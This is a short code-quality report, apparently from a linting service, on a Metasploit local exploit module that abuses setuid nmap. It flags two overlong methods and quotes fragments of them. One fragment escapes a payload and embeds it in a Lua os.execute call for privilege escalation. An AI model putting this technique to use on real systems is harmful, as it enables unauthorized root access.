modules/exploits/unix/local/setuid_nmap.rb
Method initialize
has 42 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Setuid Nmap Exploit',
Method exploit
has 28 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def exploit
if (target.arch.include? ARCH_CMD)
p = payload.encoded.gsub(/([$"])/) { |_m| "\\#{Regexp.last_match(1)}" }
evil_lua = %{ os.execute("#{p} &") }
else